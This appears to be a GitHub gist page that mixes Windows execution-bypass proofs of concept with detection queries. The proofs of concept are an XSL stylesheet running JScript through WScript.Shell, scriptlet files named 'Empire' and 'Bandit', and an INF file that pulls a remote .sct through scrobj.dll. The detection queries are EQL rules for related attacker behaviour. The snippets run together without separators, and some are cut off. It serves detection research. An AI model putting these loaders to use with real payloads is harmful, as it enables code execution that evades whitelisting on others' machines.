Skip to content

Instantly share code, notes, and snippets.

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="Jscript">
<![CDATA[
var x = new ActiveXObject("WScript.Shell").Run("notepad.exe");
]]></ms:script>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
Dim shl
Set shl = CreateObject("Wscript.Shell")
Call shl.Run("notepad.exe")
Set shl = Nothing
WScript.Quit
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>
[version]
signature=$WiNdows NT$
[DefaultInstall_SingleUser]
UnRegisterOCXs=D9AB
[D9AB]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/Samirbous/f581143f7ce4c3697f31d8780c1c45c6/raw/054f3af511b37dae556789161bbea1ad222b5f65/notepad.sct
[Strings]
serviceName=" "
shortSvcName=" "
sequence by host.id with maxspan=1m
[authentication where event.action : "logged-in" and
event.outcome == "success" and user.id: "S-1-5-21-*" and
process.pid == 0 and
winlog.event_data.LogonProcessName:"NtLmSsp*"and
winlog.event_data.LogonType == 3 and source.ip == "127.0.0.1"] by winlog.event_data.TargetLogonId
[process where event.type == "start"] by winlog.event_data.TargetLogonId
sequence by host.hostname with maxspan=1m
[network where network.direction : ("egress", "outgoing") and
process.name != "spoolsv.exe" and not network.protocol == "dns" and not user.name : "SYSTEM" and
source.port >= 49152 and destination.port >= 49152] by destination.address,source.address, destination.port, source.port
[network where process.name : "spoolsv.exe" and user.name : "SYSTEM" and
network.direction : ("ingress", "incoming") and
not network.protocol == "dns" and
source.port >= 49152 and destination.port >= 49152] by source.address, destination.address, destination.port, source.port
process where event.action : "start" and
process.executable : "?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" and
process.args_count <= 2 and process.args_count > 1 and
not process.args : "?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
sequence by host.id with maxspan=1s
[process where event.action : "creation_event" and
process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
not (process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\WINDOWS\\splwow64.exe") and
process.args_count >= 2)
] by process.parent.entity_id
[process where event.action : "termination_event" and
process.name : ("winword.exe", "excel.exe", "powerpnt.exe") and
process.parent.name : ("winword.exe", "excel.exe", "powerpnt.exe", "explorer.exe", "outlook.exe", "thunderbird.exe")
] by process.entity_id
event.code:4688 and winlog.event_data.TargetUserSid :"S-1-0-0" and not winlog.event_data.TargetUserName:*$ and
not winlog.event_data.TargetUserName:- and not winlog.event_data.TargetUserName:"defaultuser100000" and
not winlog.event_data.TargetUserName : ("LOCAL SERVICE" or "NETWORK SERVICE") and
not winlog.event_data.TargetDomainName : ("NT Service" or "Font Driver Host")